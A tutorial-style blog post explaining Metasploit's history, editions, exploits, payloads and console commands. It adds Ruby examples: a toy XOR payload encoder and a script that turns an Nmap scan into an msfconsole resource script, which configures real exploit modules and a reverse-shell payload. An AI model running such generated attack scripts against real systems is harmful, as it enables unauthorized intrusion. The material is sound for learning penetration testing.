What is Metasploit?

The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and Intrusion Detection System (IDS) signature development. Penetration testing is an authorized, simulated attack on a computer system that looks for security weaknesses; an IDS, by contrast, monitors a network or system for malicious activity, and the exploits Metasploit ships are a ready source of attack traffic for writing and testing its signatures. The best-known sub-project is the Metasploit Framework, an open-source tool for developing and running exploit code against a remote target and the most widely used exploit development framework in the world. I will elaborate on the framework later in this article.

It can be used for both legitimate (authorized) and unauthorized activity on computer systems. In this regard it is no different from comparable commercial products such as Immunity's Canvas or Core Security Technologies' Core Impact. Like them, Metasploit is commonly used to test computer systems for vulnerabilities or to break into remote systems.

Historical Background:

Since H. D. Moore created it in 2003 as a portable network tool written in the high-level language Perl, Metasploit and its framework have gone through two major changes. First, by 2007 the framework had been completely rewritten in the Ruby programming language. Later, in 2009, Rapid7, a security company that provides unified vulnerability management solutions, acquired the project.

Two of Rapid7's main contributions were the releases of Metasploit Express and Metasploit Pro. Metasploit Express, released in 2010, targets security teams that need to verify vulnerabilities. It provides automated evidence collection and also lets the user run brute-force attacks against credentials. Further, Metasploit Express integrates the Network Mapper (Nmap) and offers a user-friendly graphical user interface (GUI).

Metasploit Pro, also released in 2010, added further features on top of Express. Its main audience is penetration testers and IT security teams. Quick Start Wizards and MetaModules, building and managing social engineering campaigns, an advanced Pro Console, web application testing, dynamic payloads for anti-virus evasion, integration with Nexpose for ad-hoc vulnerability scans, and Virtual Private Network (VPN) pivoting are the features that characterize Metasploit Pro.

Metasploit 4.0 was released in 2011; the preceding 3.x line (the 2007 Ruby rewrite) had received regular updates before that. Fuzzing tools, which feed random and unexpected inputs to a program and watch for exceptions and crashes, were added to the 3.x versions so that the project could be used to discover new software vulnerabilities and not merely to exploit known bugs. Accordingly, third-party Metasploit modules emerged that scan software for potentially exploitable conditions in order to produce reliable exploitability risk results and to recommend remediation for the bugs found.

Exploits:

Fundamentally, an exploit is a piece of software, a chunk of data, or a sequence of commands that takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior on a computer system or in a piece of software. At the time of writing, Metasploit ships around 1613 exploits, organized into four main categories.

The first category is Android and Apple iOS, which targets mobile phones. Firefox is another category, covering remote code execution in that browser. A further category targets specific operating systems such as Windows, Linux, Unix, Mac OS X, Sun Solaris and so on. The remaining category is multi: exploits not tied to any specific platform belong here.

Payloads: 

In computer networking, a payload is the part of transmitted data that carries the actual intended message; in the context of malware, it is the portion of the code that performs the malicious action once it has been delivered to the victim's computer. In Metasploit, the payload is the code that runs on the target after an exploit succeeds. Metasploit ships over 438 payloads. One of the most common is the Command Shell, which lets the user run collection scripts or arbitrary commands on the host.

Meterpreter is another payload. It is an interactive, in-memory shell that lets the user control the target's screen over Virtual Network Computing (VNC) and browse, upload and download files. Dynamic payloads are a further type: they generate a unique payload on each run in order to evade anti-virus defenses.
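As an added example (not code from the Metasploit project), the following Ruby script shows the mechanics behind an encoded or "dynamic" payload: a single-byte XOR encoder that, like the framework's encoders, chooses a key so the encoded bytes avoid a caller-supplied set of bad characters, draws that key at random so every encoding of the same payload looks different, and recovers the original bytes with a fixed decode routine. The payload bytes, the bad-character set and the function names are all constructed for illustration.

```ruby
# Added example, not Metasploit code: a toy single-byte XOR encoder that
# mimics two properties of the framework's encoders and "dynamic" payloads.
#   1. The encoded bytes never contain a caller-supplied bad character
#      (e.g. "\x00", which would terminate a C string copy mid-payload).
#   2. The key is chosen at random, so every encoding of the same payload
#      differs, while xor_decode always recovers the original bytes.

# Typical bad characters for string-based overflows: NUL, LF, CR.
BAD_CHARS_DEFAULT = [0x00, 0x0a, 0x0d].freeze

# Constructed stand-in for real shellcode; it deliberately contains
# a NUL and a LF, so an unencoded copy would be truncated.
SAMPLE_PAYLOAD = "\x31\xc0\x50\x68\x00\x0a\xcc\x90".b.freeze

def contains_bad_chars?(bytes, bad_chars = BAD_CHARS_DEFAULT)
  bytes.each_byte.any? { |b| bad_chars.include?(b) }
end

# Choose a key from a shuffled 1..255 such that neither the key nor any
# encoded byte is in bad_chars. Returns nil if no single-byte key works
# (for example when the payload already contains every byte value).
def pick_xor_key(payload, bad_chars, rng: Random.new)
  (1..255).to_a.shuffle(random: rng).find do |k|
    !bad_chars.include?(k) &&
      payload.each_byte.none? { |b| bad_chars.include?(b ^ k) }
  end
end

# Returns [key, encoded_bytes]. Pass key: to force a specific key
# (useful for reproducible tests); otherwise one is drawn from rng.
def xor_encode(payload, bad_chars: BAD_CHARS_DEFAULT, rng: Random.new, key: nil)
  key ||= pick_xor_key(payload, bad_chars, rng: rng)
  raise ArgumentError, 'no single-byte XOR key avoids the bad characters' if key.nil?
  encoded = payload.bytes.map { |b| b ^ key }.pack('C*')
  # A forced key may still produce a bad byte; refuse rather than emit it.
  if bad_chars.include?(key) || contains_bad_chars?(encoded, bad_chars)
    raise ArgumentError, "key 0x#{key.to_s(16)} produces a bad character"
  end
  [key, encoded]
end

# The inverse transform; in a real encoder this is the machine-code
# decoder stub prepended to the encoded payload.
def xor_decode(key, encoded)
  encoded.bytes.map { |b| b ^ key }.pack('C*')
end

if __FILE__ == $PROGRAM_NAME
  key, enc = xor_encode(SAMPLE_PAYLOAD)
  puts format('key=0x%02x encoded=%s bad_chars_present=%s',
              key, enc.unpack1('H*'), contains_bad_chars?(enc))
  puts "round trip ok: #{xor_decode(key, enc) == SAMPLE_PAYLOAD}"
end
```

In the real framework the decode routine is a few bytes of machine code prepended to the encoded payload, and that stub must itself avoid the bad characters; msfvenom's -b option (for example -b '\x00\x0a\x0d') is what drives this key selection. Keep in mind that uniqueness alone does not defeat current anti-virus products, which detect the decoder stub or the decoded payload in memory, so in practice an encoder is a bad-character tool far more than an evasion tool.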

Metasploit Framework:

It is basically an open-source framework that accepts contributions from developers through GitHub. Such contributions are mainly exploits and scanners, and they are reviewed by a team consisting of Rapid7 employees and senior external contributors. The main developers of the framework are H. D. Moore, Matt Miller and spoonm.

Metasploit Interfaces:

Other than Metasploit Express and Metasploit Pro, there are four other main interfaces for Metasploit. Metasploit Framework Edition is the free version of Metasploit. It offers a command line interface, and its installer bundles Zenmap, a well-known graphical front end for the Nmap port scanner, and a Ruby interpreter, Ruby being the language the framework is written in. Metasploit Community Edition is another free version. It is included in the main installer and offers a web-based interface with features such as manual exploitation, network discovery and module browsing.

Armitage is another free interface: a graphical cyber attack management tool that visualizes targets and recommends exploits based on their vulnerabilities. It is an open-source network security tool that lets a team share sessions, data and communication through a single Metasploit instance. Cobalt Strike is another interface; it contains all the features of Armitage and adds post-exploitation tools and report generation. It is, however, a commercial product from a different company, Strategic Cyber LLC.

How to exploit a system using Metasploit:

One of the main advantages of the Framework is that any exploit can be combined with any compatible payload. Before going through the detailed steps of exploiting a system, one must first gather some information about the intended target.

How can we learn which network services and operating system versions are installed, for instance? For that we can use port scanning, which finds the ports a host has open, and OS fingerprinting, which analyzes the data flowing from the system; tools such as Nmap and vulnerability scanners such as Nexpose, Nessus and OpenVAS do this. To make exploitation more accurate, Metasploit can import the data produced by such vulnerability scanners and match the proposed exploit against the vulnerabilities that were actually found.

There are five basic steps in exploiting a system using Metasploit:

  1. Choose an exploit (code that enters the target by taking advantage of one of its bugs) and configure its options for the target system.
  2. Check whether the target system is actually susceptible to the chosen exploit.
  3. Choose the payload, the code that will run on the target once the exploit succeeds.
  4. Choose an encoding technique so that the intrusion-prevention system (IPS) does not recognize the encoded payload and lets it through.
  5. Finally, execute the exploit.
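As an added example of the reconnaissance-then-exploit flow, not code from the Metasploit project: the Ruby script below parses an Nmap XML report for one lab host, matches the open services against a small table of exploit modules, and emits an msfconsole resource script that walks the five steps above (use, set options, pick a payload, optionally set an encoder, check, exploit). The Nmap output, the host addresses and the service-to-module table are constructed for illustration; the module and payload names are real Metasploit module paths, but the version matching is deliberately loose and is an assumption of this example rather than framework logic.

```ruby
# Added example, not part of Metasploit: turn an Nmap service scan into
# an msfconsole resource script covering the five exploitation steps.
# Everything below is constructed for illustration; the module paths are
# real Metasploit module names, but the service-to-module mapping is an
# assumption of this example, not framework logic.
require 'rexml/document'

# Constructed Nmap -sV output for one lab host (RFC 5737 test address).
NMAP_XML = <<~XML
  <?xml version="1.0"?>
  <nmaprun scanner="nmap" args="nmap -sV -oX scan.xml 192.0.2.10">
    <host>
      <status state="up"/>
      <address addr="192.0.2.10" addrtype="ipv4"/>
      <ports>
        <port protocol="tcp" portid="21"><state state="open"/>
          <service name="ftp" product="vsftpd" version="2.3.4"/></port>
        <port protocol="tcp" portid="22"><state state="open"/>
          <service name="ssh" product="OpenSSH" version="4.7p1"/></port>
        <port protocol="tcp" portid="139"><state state="open"/>
          <service name="netbios-ssn" product="Samba smbd" version="3.X - 4.X"/></port>
        <port protocol="tcp" portid="8080"><state state="filtered"/>
          <service name="http-proxy"/></port>
      </ports>
    </host>
  </nmaprun>
XML

Service = Struct.new(:host, :port, :name, :product, :version)

# Illustrative lookup table (assumption): product/version patterns -> module.
# Version patterns are loose on purpose; a real workflow would rely on the
# framework's own search and the module's check method instead.
MODULE_TABLE = [
  { product: /vsftpd/i, version: /\A2\.3\.4\z/,
    exploit: 'exploit/unix/ftp/vsftpd_234_backdoor', payload: 'cmd/unix/interact' },
  { product: /samba/i, version: /\b3\./,
    exploit: 'exploit/multi/samba/usermap_script', payload: 'cmd/unix/reverse',
    needs_lhost: true },
].freeze

# Reconnaissance: extract only open services from the Nmap XML.
def parse_nmap(xml)
  doc = REXML::Document.new(xml)
  services = []
  doc.elements.each('nmaprun/host') do |host|
    addr = host.elements['address'].attributes['addr']
    host.elements.each('ports/port') do |port|
      next unless port.elements['state'].attributes['state'] == 'open'
      attrs = port.elements['service']&.attributes
      services << Service.new(addr, port.attributes['portid'].to_i,
                              attrs && attrs['name'], attrs && attrs['product'],
                              attrs && attrs['version'])
    end
  end
  services
end

# Steps 1 and 3: pick exploit modules (and a compatible payload) per service.
def candidate_modules(services)
  services.flat_map do |svc|
    MODULE_TABLE.select { |m| m[:product].match?(svc.product.to_s) && m[:version].match?(svc.version.to_s) }
                .map { |m| [svc, m] }
  end
end

# Steps 1-5 as msfconsole commands. encoder: nil leaves step 4 out.
def resource_script(services, lhost:, encoder: nil)
  lines = candidate_modules(services).flat_map do |svc, m|
    cmds = ["use #{m[:exploit]}", "set RHOSTS #{svc.host}", "set RPORT #{svc.port}",
            "set PAYLOAD #{m[:payload]}"]
    cmds << "set LHOST #{lhost}" if m[:needs_lhost]
    cmds << "set ENCODER #{encoder}" if encoder
    cmds + ['check', 'exploit -z']
  end
  lines.join("\n") + "\n"
end

puts resource_script(parse_nmap(NMAP_XML), lhost: '192.0.2.1') if __FILE__ == $PROGRAM_NAME
```

Save the output as, say, lab.rc and run msfconsole -r lab.rc; inside the console the framework's own route is db_import scan.xml followed by the services and search commands. Two caveats a practitioner should keep in mind: not every module implements check (those that do not simply print a message, and the script then falls through to exploit, so review the generated commands before running them), and the encoder option is left unset here because the command-shell payloads chosen are not native binaries, so an encoder would add nothing.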

Some Commands used:

search <pattern>

Searches the module database for a match on the given pattern. For example, "search xxx" lists every module whose name or description contains "xxx".

use <exploit name>

Tells the console to load a particular exploit module.

set <option> <value>

Sets the value of a given option for the current module.

setg <option> <value>

Sets the value of a given option globally, so that it does not have to be set again for every module.

exploit

Finally, this runs the attack against the target system.

This post was written by hsamanoudy